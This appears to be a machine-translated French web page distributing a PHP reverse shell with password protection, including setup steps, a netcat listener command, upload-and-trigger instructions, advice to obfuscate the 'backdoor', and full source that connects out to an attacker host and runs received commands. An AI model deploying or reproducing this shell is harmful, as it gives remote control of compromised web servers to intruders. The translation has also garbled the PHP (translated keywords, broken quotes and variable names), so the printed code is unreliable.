Inverser Shell v1.0 PHP – fonction d
Produit par:
Ashfaq Ansari
Version:
1.0
Prix:
Librement

Commenté par:
Classement:
5
Sur Octobre 9, 2012
Dernière mise à jour:Janvier 18, 2013

Résumé:

Connect Reverse Shell PHP avec la fonction d'authentification intégré. Scénario impressionnant pour protéger votre porte dérobée.

Présentation

 

Cet outil est conçu pour pentest situation où vous avez téléchargement accéder à un serveur Web qui exécute PHP.
Téléchargez ce script quelque part dans la racine web puis exécutez-le en accédant à l'URL appropriée dans votre navigateur. Le script va ouvrir une connexion TCP sortante du serveur Web dans un hôte et le port défini dans le script. Lié à cette connexion TCP sera une coquille.
 

Ce sera un shell interactif approprié dans lequel vous pouvez exécuter des programmes comme interective Telnet et SSH.
Cette coquille a une fonctionnalité d'authentification intégré qui empêche quelqu'un d'autre d'abuser de votre porte dérobée.
Elle diffère de la coquille forme basée sur le Web qui vous permettent d'envoyer une seule commande, puis vous la sortie retour.
 

Modifier la source

 

1
2
3
$IP = "127.0.0.1"; #Changez ceci à votre IP publique
$Port = 4444;      #Changez ceci à votre Port
$mot de passe = base64_decode("aGFja3N5c3RlYW0="); #Mot de passe par défaut: hacksysteam (MD5)

 

Modifiez les valeurs selon vos besoins et de la situation.
 

Obfuscate La Source

 

Une fois que vous avez fait la modification, vous pouvez utiliser n'importe quelle ligne PHP Obfuscator pour coder le script PHP.
 

Exemple: http://www.codeeclipse.com/
 

Avant obscurcir, s'il vous plaît changer les valeurs ci-dessus en fonction de vos besoins.
 

Configuration Netcat Listener

 

Lancer un auditeur Netcat sur un hôte et le port qui sera accessible par le serveur Web.
Utilisez le même port ici que vous avez spécifié dans le script shell inverse par exemple (4444):
 

1
root @ bt:~ # nc -lvvp 4444

 

Téléchargez le script et l'exécuter

 

Utilisation de la vulnérabilité découverte par vous sur le site, télécharger reverse_shell.php.
Exécutez le script simplement en naviguant sur le fichier nouvellement téléchargé dans votre navigateur Web.
 

1
http://<Victime IP>/<Téléchargez chemin>/reverse_shell.php

 

Remarque: Vous ne verrez aucune sortie sur la page web, il continue en mode d'attente si son succès.
 

Ramassez avec votre coquille

 

Source Code

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Inverser Shell v1.0 #
#             Authentification Caractéristique #
#                                                 #
#            Hacksys équipe - Panthera #
#             Auteur: Ashfaq Ansari #
#            hacksysteam@hotmail.com #
#          http://hacksys.vfreaks.com #
#              Conçu pour Linux #
#             Merci à lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$VERSION = "1,0";
$IP = "127.0.0.1"; #Modifier cette
$Port = 4444;      #Modifier cette
$mot de passe = base64_decode(&quot;aGFja3N5c3RlYW0="); #Mot de passe par défaut: hacksysteam (MD5)

$bannière = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ ___ _ _
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Inverser Shell en PHP
    Auteur: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com /\n\n"
);

$pwd = shell_exec("Pwd");
$sysinfo = shell_exec("Uname-a");
$Identifiant = shell_exec('Id | cut-d "(" -f 2 | cut-d ")" -f 1 ');
$Date = shell_exec(«Date");
$seulement = 1337;
$infos =
("
Informations sur le système:\n$sysinfo
Répertoire de travail courant: $pwd
User Group: $Identifiant
Date et heure actuelles: $Date\n
"
);

imprimer "\nEssayer de se connecter à: $IP sur le port $Port ...\n\n";

$sockfd = fsockopen($IP , $Port , $errno, $errstr );

si($errno != 0)
  {
    imprimer "\n****** Une erreur est survenue ******\nNnumber d'erreur: $errno\nchaîne d'erreur: $errstr\n\n";
    le(0);
  }
autre si (!$sockfd)
  {
    imprimer "Fatal : Une erreur inattendue s'est survenue lors de la tentative de connexion!\n";
  }
autre
  {
    imprimer "Connecté à: $IP sur le port $Port ...\n\n";
    fputs ($sockfd , $bannière);
    fputs($sockfd ,"Mot de passe: ");
    $GETPASS = couper(fgets($sockfd, strlen($mot de passe) + 2));

    si ($GETPASS == $mot de passe)
    {
      fputs($sockfd, "\nSuccessfull d'authentification..\n");
      fputs($sockfd, $infos);
      pendant que(!EOF($sockfd))
      {
    $cmdPrompt = couper($Identifiant) . «@" . couper($IP) . ":~" . couper($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $commande = couper(fgets($sockfd, $seulement));
        si (couper($commande) == "Exit")
    {
      fputs($sockfd ,"\nInterrompu par l'utilisateur ... Sortie ..." );
      fclose($sockfd);
      le(0);
    }
    fputs($sockfd , "\n" . shell_exec($commande) . "\n");
      }
      fclose($sockfd);
      le(0);
    }
    autre
    {
      fputs($sockfd ,"\nMot de passe incorrect ... Cesser de fumer ...");
      fclose($sockfd);
      le(0);
    }
  }
?>

 

Capture d'écran

 


 

Télécharger º Shell v1.0 PHP – fonction d'authentification

 

Reverse_Shell_v1.0.zip

 
 
 

20,999 vues au total, 7 vues aujourd'hui

Les deux onglets suivants changent contenu ci-dessous.

Ashfaq Ansari

chercheur en sécurité
Ashfaq Ansari est le fondateur de HackSys équipe nom de code "Panthera". Il est un chercheur en sécurité avec une expérience dans divers aspects de la sécurité de l'information. Il est l'auteur "HackSys Extreme pilote Vulnérable" et "Shellcode de la mort". Il a également écrit et publié plusieurs livres blancs sur l'exploitation du logiciel de bas niveau. Son intérêt de base réside dans "Low Level exploitation", "Reverse Engineering", "Analyse du programme" et "Hybrid fuzzing". Il est un fanboy de l'intelligence artificielle et l'apprentissage automatique. Il est le chef de file pour le chapitre null Pune.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont marqués *